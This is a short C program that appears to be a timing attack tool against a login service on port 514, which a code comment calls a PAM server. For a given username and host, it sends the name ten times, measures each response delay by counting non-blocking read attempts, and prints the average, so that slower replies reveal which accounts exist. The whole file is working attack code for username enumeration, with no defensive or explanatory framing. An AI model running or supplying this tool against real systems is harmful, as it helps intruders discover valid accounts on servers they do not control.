#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <sys/time.h>
#include <errno.h>
#include <fcntl.h>


void die(char *s)
{
	perror(s);
	exit(errno);
}


/* Simple tcp_connect(). Disables Nagle.
 */
int tcp_connect(const char *host, u_short port)
{
	int sock, one = 1, len = sizeof(one);
	struct hostent *he;
	struct sockaddr_in sin;

	if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0)
		die("sock");

	if ((he = gethostbyname(host)) == NULL) {
		herror("gethostbyname");
		exit(EXIT_FAILURE);
	}

	memset(&sin, 0, sizeof(sin));
	memcpy(&sin.sin_addr, he->h_addr, he->h_length);
	sin.sin_family = AF_INET;
	sin.sin_port = port == 0 ? htons(873):htons(port);

	if (connect(sock, (struct sockaddr*)&sin, sizeof(sin)) < 0) {
		close(sock);
		return -1;
	}
	if (setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, &one, len) < 0)
		die("setsockopt");

	return sock;
}


int try(char *user, char *addr)
{
	char nl = '\n', buf[1024];
	int r, i = 0;

	/* PAM server was running at 514 :-) */
	int fd = tcp_connect(addr, 514);

	r = read(fd, buf, sizeof(buf));	

	write(fd, user, strlen(user));
	write(fd, &nl, 1);
	fcntl(fd, F_SETFL, fcntl(fd, F_GETFL)|O_NONBLOCK);

	while (read(fd, buf, sizeof(buf)) == -1)
		++i;


	write(fd, "X", 1);
	write(fd, &nl, 1);

	close(fd);
	return i;
}


int main(int argc, char **argv)
{
	int i, r;
	float sum = 0;

	if (argc < 3) {
		printf("Usage: %s <user> <host>\n", *argv);
		exit(1);
	}

	setbuffer(stdout, NULL, 0);
	printf("[ ");
	for (i = 0; i < 10; ++i) {
		sleep(2);
		r = try(argv[1], argv[2]);
		printf("%d ", r);
		sum += r;
	}
	printf("]\n-> %f\n", sum/10);
	return 0;
}

